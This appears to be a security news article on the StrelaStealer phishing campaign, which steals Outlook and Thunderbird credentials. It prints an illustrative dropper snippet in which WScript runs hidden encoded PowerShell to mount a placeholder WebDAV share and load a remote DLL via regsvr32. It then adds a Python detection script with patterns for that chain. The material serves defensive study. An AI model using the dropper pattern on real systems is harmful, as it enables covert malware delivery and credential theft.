StrelaStealer malware: stealing e-mail credentials through phishing
StrelaStealer is malware distributed through phishing that steals credentials from e-mail clients such as Outlook and Thunderbird. It uses multi-stage obfuscation and in-memory execution to evade traditional detection, fetching a malicious DLL from a WebDAV server and executing it, and poses a serious threat to organizations worldwide. 2025-4-18 11:52:31 Author: cybersecuritynews.com

Researchers Uncovered The Stealthy StrelaStealer Malware Tactics, Techniques, and Procedures

StrelaStealer is an information stealer that specifically targets stored e-mail credentials in popular clients such as Microsoft Outlook and Mozilla Thunderbird, creating significant security risks for organizations worldwide.

The malware operates by exfiltrating sensitive login information, potentially providing attackers with access to critical communications and data.

StrelaStealer spreads primarily through large-scale phishing campaigns that deliver ZIP archives containing malicious JavaScript files.


These scripts are only the first stage of a longer attack chain: the script maps a WebDAV server, retrieves a malicious DLL from it, and has it loaded directly into memory rather than saved as a conventional download, which avoids many traditional file-based detection methods.

The sophisticated delivery mechanism allows attackers to bypass standard security controls while maintaining operational effectiveness.

The malware campaigns have impacted over 100 organizations across Europe and the United States, with particular concentration in Italy, Spain, Germany, and Ukraine.

The widespread nature of these attacks suggests a well-orchestrated campaign with specific targeting parameters rather than random distribution.

AttackIQ researchers identified that StrelaStealer is associated with the threat actor group designated as HIVE-0145, a cluster active since late 2022.

Security analysts believe this group operates as a financially motivated initial access broker, potentially serving as the sole operator behind StrelaStealer deployments.

The identification of the threat actor provides valuable context for understanding the malware’s objectives and operational patterns.

Recent analysis from November 2024 revealed updated delivery and obfuscation techniques, demonstrating the malware’s continued evolution.

These enhancements indicate active development and maintenance of the threat, suggesting ongoing campaigns.

Infection Mechanism Deep Dive

The StrelaStealer infection process begins when victims execute the JavaScript file from the ZIP archive, typically using the Windows Script Host (CScript or WScript).

The initial script employs multi-stage obfuscation; recent variants have been observed using the following technique:

// Illustrative dropper stage as reproduced on the page; the address 10.10.10.10, the share name
// and payload.dll are placeholders, not indicators from a real campaign.
// Note that powershell.exe -enc expects the Base64 of a UTF-16LE string; the blob as printed here
// is plain ASCII Base64 and serves only to show the shape of the command.
var encoded = "powershell.exe -enc UEdVdEFBQiB1c2UgXFxcXDEwLjEwLjEwLjEwXFxzaGFyZSAvcGVyc2lzdDpubzsgcmVnc3ZyMzIgXFxcXDEwLjEwLjEwLjEwXFxzaGFyZVxwYXlsb2FkLmRsbA==";
// Run with window style 0 (hidden) and wait for the process to exit (true).
WScript.CreateObject("WScript.Shell").Run(encoded, 0, true);

This code spawns a hidden PowerShell process that executes an encoded command: it first maps the WebDAV share as a network path (net use), then calls regsvr32 with the UNC path of the DLL, so that the payload is fetched from the share and its DllRegisterServer entry point runs inside the trusted regsvr32 process.
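The chain described above (a script host spawning PowerShell with an encoded command that runs net use against a remote share and then regsvr32 on a UNC path) is what a detection engineer would want to catch in process-creation telemetry. The following is an added example, not code from the original article or from the StrelaStealer operators: it decodes PowerShell -EncodedCommand payloads the way powershell.exe does (Base64 of UTF-16LE, any unique prefix of the flag accepted) and applies the chain heuristics to a few constructed Sysmon Event ID 1 style records. The field names and the sample command lines are assumptions made for the example; the 10.10.10.10 address is the placeholder from the article.

```python
"""Flag the WScript -> PowerShell -enc -> net use -> regsvr32 UNC chain in process logs."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# "net use [X: | *] \\host\share": mounting a remote (here WebDAV) share.
NET_USE = re.compile(r"\bnet(?:\.exe)?\s+use\s+(?:(?:[A-Za-z]:|\*)\s+)?(\\\\\S+)", re.I)
# regsvr32 with a DLL argument on a UNC path, optional switches such as /s in between.
REGSVR_UNC = re.compile(r"\bregsvr32(?:\.exe)?\b[^;&|]*?(\\\\\S+\.dll)", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def encode_powershell(command):
    """Build a valid -enc argument: Base64 over the UTF-16LE bytes of the command."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -enc payload, or None if the command line carries none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if len(raw) % 2:  # UTF-16LE text always has an even byte length
        return None
    return raw.decode("utf-16le", errors="replace")


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(event):
    """Return a list of findings for one process-creation record (Sysmon Event ID 1 style fields)."""
    findings = []
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline) if image in POWERSHELL else None
    # Match patterns against both the raw command line and the decoded payload.
    text = cmdline if decoded is None else cmdline + "\n" + decoded

    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        findings.append("script-host spawned PowerShell")
    if decoded is not None:
        findings.append("encoded PowerShell command")
    m = NET_USE.search(text)
    if m:
        findings.append("net use of remote share " + m.group(1))
    m = REGSVR_UNC.search(text)
    if m:
        findings.append("regsvr32 loading DLL from UNC path " + m.group(1))
    return findings


# Constructed sample records (assumed field names); not real telemetry.
SAMPLE_EVENTS = [
    {   # benign: an admin running an encoded one-liner from an interactive session
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -enc " + encode_powershell("Get-Date"),
    },
    {   # StrelaStealer-style chain: JS dropper under wscript.exe spawns hidden encoded PowerShell
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -enc " + encode_powershell(
            r"net use \\10.10.10.10\share /persist:no; regsvr32 \\10.10.10.10\share\payload.dll"),
    },
    {   # benign: installer registering a local COM DLL
        "ParentImage": r"C:\Windows\System32\msiexec.exe",
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\component.dll",
    },
]


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, _basename(ev["ParentImage"]), "->", _basename(ev["Image"]), analyze_event(ev))
```

Only the second record produces all four findings; a rule that alerts on the script-host parent plus either the net use or the regsvr32 UNC finding keeps the encoded admin one-liner and the local regsvr32 call quiet.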

The malware then performs extensive system reconnaissance, collecting information about the host, installed applications, country locale, and internet connectivity, before exfiltrating the gathered data and harvested credentials over plain, unencrypted HTTP.

This sophisticated approach demonstrates the threat actor’s commitment to stealth and operational security while maintaining effective credential harvesting capabilities across targeted organizations.



Source: https://cybersecuritynews.com/researchers-uncovered-the-stealthy-strelastealer-malware/